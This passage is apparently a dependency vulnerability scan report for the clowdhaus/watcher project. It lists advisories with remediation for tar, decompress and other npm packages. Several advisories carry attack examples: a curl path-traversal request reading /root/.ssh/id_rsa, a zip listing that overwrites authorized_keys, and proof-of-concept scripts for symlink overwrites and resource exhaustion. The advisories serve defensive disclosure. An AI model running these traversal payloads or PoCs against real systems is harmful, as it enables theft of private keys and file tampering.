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high severity

Directory Traversal

  • Vulnerable module: decompress
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 decompress@4.2.1

Overview

decompress is a package that can be used for extracting archives.

Affected versions of this package are vulnerable to Directory Traversal via improper validation in the safeMakeDir function and extraction path validation process. An attacker can write arbitrary files outside the intended extraction directory by crafting archive entries with paths that exploit the flawed containment check and unvalidated symlink creation.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

There is no fixed version for decompress.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the lack of enforced upper bounds on total decompressed data, entry counts, or decompression ratio in extraction and parsing paths such as src/extract.ts. An attacker can exhaust disk space and CPU resources by submitting a small crafted gzip archive with a high decompression ratio.

Remediation

Upgrade tar to version 7.5.19 or higher.

References

high severity

Infinite loop

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Infinite loop via the replace method. An attacker can cause the archive scanner to enter an infinite loop by providing a tar header with a negative base-256 encoded entry size.

Remediation

Upgrade tar to version 7.5.18 or higher.

References

high severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via the extract() function. An attacker can read or write files outside the intended extraction directory by causing the application to extract a malicious archive containing a chain of symlinks leading to a hardlink, which bypasses path validation checks.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.8 or higher.

References

high severity

Directory Traversal

  • Vulnerable module: decompress
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 decompress@4.2.1

Overview

decompress is a package that can be used for extracting archives.

Affected versions of this package are vulnerable to Directory Traversal and link following during archive extraction, where symlink and hardlink entries are created without checking their targets and the directory containment check relies on a string prefix comparison. An attacker can read or write files outside the target directory, and create setuid, setgid, or sticky-bit files when extraction runs as root, by supplying an archive containing out-of-target link entries, a path that shares a prefix with the output directory such as /srv/out-old against /srv/out, or entries whose modes retain special bits that mode & ~umask fails to strip. Exploitation requires extracting an untrusted or attacker-influenced archive in tar, tar.gz, tar.bz2, or zip format, and the privileged-file outcome requires extraction to run as root.

Workaround

The privileged-file outcome can be avoided by running extraction as a non-root user, which prevents the permission flaw from creating setuid, setgid, or sticky-bit files, though it does not address the path traversal or link-following flaws.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

There is no fixed version for decompress.

References

high severity

Symlink Attack

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Symlink Attack exploitable via stripAbsolutePath(), used by the Unpack class. An attacker can overwrite arbitrary files outside the intended extraction directory by including a hardlink whose linkpath uses a drive-relative path such as C:../target.txt in a malicious tar.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.10 or higher.

References

high severity

Symlink Attack

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Symlink Attack via tar.x() extraction, which allows an attacker to overwrite arbitrary files outside the intended extraction directory with a drive-relative symlink target - like C:../../../target.txt.

PoC


const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({
  path: 'a/b/l',
  type: 'SymbolicLink',
  linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.11 or higher.

References

medium severity

Symlink Attack

  • Vulnerable module: decompress
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 decompress@4.2.1

Overview

decompress is a package that can be used for extracting archives.

Affected versions of this package are vulnerable to Symlink Attack in the symlink handling process. An attacker can create arbitrary symbolic links outside the intended extraction directory by crafting an archive with malicious symlink entries, potentially exposing sensitive files when the application accesses the extracted contents.

Remediation

There is no fixed version for decompress.

References

medium severity

Symlink Attack

  • Vulnerable module: decompress
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 decompress@4.2.1

Overview

decompress is a package that can be used for extracting archives.

Affected versions of this package are vulnerable to Symlink Attack via the fs.link process. An attacker can gain unauthorized access to sensitive files or corrupt file contents by crafting an archive containing a hardlink entry with a linkname field set to an absolute path on the same filesystem. This allows the creation of a hardlink in the extraction directory that points to any file on the same filesystem, enabling both reading and overwriting of the original file's content. This is only exploitable if the attacker is able to supply a crafted archive and the extraction occurs on the same filesystem as the target file.

Remediation

There is no fixed version for decompress.

References

medium severity

Infinite loop

  • Vulnerable module: file-type
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 file-type@16.5.4
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 file-type@16.5.4

Overview

Affected versions of this package are vulnerable to Infinite loop in the FileTypeParser class. This is triggered when the ASF (WMV/WMA) parser receives input including an ASF sub-header with a size value of 0. An attacker can interrupt service with a 55-byte payload.

Remediation

Upgrade file-type to version 21.3.1 or higher.

References

medium severity

Incorrect Type Conversion or Cast

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Incorrect Type Conversion or Cast via the src/pax.ts file. An attacker can cause a process crash by providing all-digit PAX path or linkpath values that are coerced to JavaScript numbers, leading to a TypeError during downstream path handling.

Remediation

Upgrade tar to version 7.5.18 or higher.

References

medium severity

Interpretation Conflict

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Interpretation Conflict due to improper handling of PAX extended header size overrides in intermediary metadata headers. An attacker can cause inconsistent archive parsing results between different tar implementations by crafting a malicious tar archive that desynchronizes the parser's interpretation, potentially hiding files from scanners or extractors that rely on different tools.

Remediation

Upgrade tar to version 7.5.16 or higher.

References

medium severity

Uncaught Exception

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Uncaught Exception through improper handling of NUL bytes in the src/pax.ts file. An attacker can cause the application to terminate unexpectedly by providing a crafted archive containing NUL bytes in PAX path or linkpath records, which leads to an uncaught exception when these values are passed to filesystem operations.

Remediation

Upgrade tar to version 7.5.17 or higher.

References

medium severity
new

Uncontrolled Recursion

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Uncontrolled Recursion in the mapHas helper and filesFilter function in src/list.ts, which walk an entry path upward with one path.dirname() call per recursion and no segment cap. An attacker can terminate the Node process with an uncatchable stack-overflow RangeError by supplying a tar archive whose GNU L or PAX x long-path header carries tens of thousands of /-separated segments, when that archive is listed or extracted with a member-selection filter. Exploitation requires the application to call tar.t() or tar.x() with a non-empty member-selection list on an untrusted archive, and on async or streaming consumers the error is uncatchable while synchronous APIs can catch it.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tar to version 7.5.21 or higher.

References

medium severity

Improper Handling of Unicode Encoding

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Improper Handling of Unicode Encoding in Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS. An attacker can overwrite arbitrary files by exploiting Unicode normalization collisions in filenames within a malicious tar archive on case-insensitive or normalization-insensitive filesystems.

Note:

This is only exploitable if the system is running on a filesystem such as macOS APFS or HFS+ that ignores Unicode normalization.

Workaround

This vulnerability can be mitigated by filtering out all SymbolicLink entries when extracting tarball data.

PoC

const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct stream
const stream = new PassThrough();

const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Key 1: "f_ss"
const header1 = new tar.Header({
    path: 'collision_ss',
    mode: 0o644,
    size: contentA.length,
});
header1.encode();

// Key 2: "f_ß"
const header2 = new tar.Header({
    path: 'collision_ß',
    mode: 0o644,
    size: contentB.length,
});
header2.encode();

// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding

stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding

// End
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
    cwd: exploitDir,
    // Ensure jobs is high enough to allow parallel processing if locks fail
    jobs: 8 
});

stream.pipe(extract);

extract.on('end', () => {
    console.log('[*] Extraction complete');

    // Check what exists
    const files = fs.readdirSync(exploitDir);
    console.log('[*] Files in exploit dir:', files);
    files.forEach(f => {
        const p = path.join(exploitDir, f);
        const stat = fs.statSync(p);
        const content = fs.readFileSync(p, 'utf8');
        console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
    });

    if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
        console.log('\[*] GOOD');
    } else {
        console.log('[-] No collision');
    }
});

Remediation

Upgrade tar to version 7.5.4 or higher.

References

medium severity

Arbitrary File Write via Archive Extraction (Zip Slip)

  • Vulnerable module: decompress-tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 decompress@4.2.1 decompress-tar@4.1.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 decompress@4.2.1 decompress-tarbz2@4.1.1 decompress-tar@4.1.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 decompress@4.2.1 decompress-targz@4.1.1 decompress-tar@4.1.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 decompress@4.2.1 decompress-tar@4.1.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 decompress@4.2.1 decompress-tarbz2@4.1.1 decompress-tar@4.1.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 decompress@4.2.1 decompress-targz@4.1.1 decompress-tar@4.1.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 decompress@4.2.1 decompress-tar@4.1.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 decompress@4.2.1 decompress-tarbz2@4.1.1 decompress-tar@4.1.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 decompress@4.2.1 decompress-targz@4.1.1 decompress-tar@4.1.1

Overview

decompress-tar is a tar plugin for decompress.

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). It is possible to bypass the security measures provided by decompress and conduct ZIP path traversal through symlinks.

PoC

const decompress = require('decompress');

decompress('slip.tar.gz', 'dist').then(files => {
    console.log('done!');
});

Details

It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:


+2018-04-15 22:04:29 ..... 19 19 good.txt

+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys

Remediation

There is no fixed version for decompress-tar.

References

medium severity

Improper Validation of Specified Index, Position, or Offset in Input

  • Vulnerable module: uuid
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 uuid@8.3.2
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 uuid@8.3.2
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 uuid@8.3.2
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 aws-sdk@2.1693.0 uuid@8.0.0
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 uuid@9.0.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

uuid is a RFC4122 (v1, v4, and v5) compliant UUID library.

Affected versions of this package are vulnerable to Improper Validation of Specified Index, Position, or Offset in Input due to accepting external output buffers but not rejecting out-of-range writes (small buf or large offset). This inconsistency allows silent partial writes into caller-provided buffers.

PoC

cd /home/StrawHat/uuid
npm ci
npm run build

node --input-type=module -e "
import {v4,v5,v6} from './dist-node/index.js';
const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';
for (const [name,fn] of [
  ['v4',()=>v4({},new Uint8Array(8),4)],
  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],
  ['v6',()=>v6({},new Uint8Array(8),4)],
]) {
  try { fn(); console.log(name,'NO_THROW'); }
  catch(e){ console.log(name,'THREW',e.name); }
}"

Remediation

Upgrade uuid to version 11.1.1, 14.0.0 or higher.

References

medium severity

Missing Release of Resource after Effective Lifetime

  • Vulnerable module: inflight
  • Introduced through: serverless-python-requirements@5.4.0 and serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless-python-requirements@5.4.0 glob-all@3.3.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: watcher@clowdhaus/watcher serverless-python-requirements@5.4.0 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 archiver@5.3.2 archiver-utils@2.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 yamljs@0.3.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/platform-client@4.5.1 archiver@5.3.2 archiver-utils@2.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 archiver@5.3.2 zip-stream@4.1.1 archiver-utils@3.0.4 glob@7.2.3 inflight@1.0.6
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/platform-client@4.5.1 archiver@5.3.2 archiver-utils@2.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/platform-client@4.5.1 archiver@5.3.2 zip-stream@4.1.1 archiver-utils@3.0.4 glob@7.2.3 inflight@1.0.6
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/platform-client@4.5.1 archiver@5.3.2 zip-stream@4.1.1 archiver-utils@3.0.4 glob@7.2.3 inflight@1.0.6

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability results in crashing the node process or in the application crash.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;
  function scheduleNext() {
    let key = `key-${i++}`;
    const callback = () => {
    };
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    setImmediate(scheduleNext);
  }


  if (i % 100 === 0) {
    console.log(process.memoryUsage());
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.

References

medium severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via processing of hardlinks. An attacker can read or overwrite arbitrary files on the file system by crafting a malicious TAR archive that bypasses path traversal protections during extraction.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.7 or higher.

References

medium severity

Arbitrary File Write via Archive Extraction (Zip Slip)

  • Vulnerable module: decompress
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/utils@6.15.0 decompress@4.2.1
  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 @serverless/dashboard-plugin@7.2.3 @serverless/utils@6.15.0 decompress@4.2.1

Overview

decompress is a package that can be used for extracting archives.

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) when extracting a ZIP archive containing two entries with the same path - the first being a symlink to an arbitrary target and the second being a regular file - the file content is written through the symlink to the target location outside the output directory. This is due to the microtask processing order that checks readlink for the second file before resolving symlink for the first file. An attacker can write arbitrary file on the host filesystem potentially leading to remote code execution by providing a specially crafted ZIP archive.

Note:

This bypasses all existing path traversal protections including preventWritingThroughSymlink, added as a part of the fix for CVE-2020-12265.

Details

It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:


+2018-04-15 22:04:29 ..... 19 19 good.txt

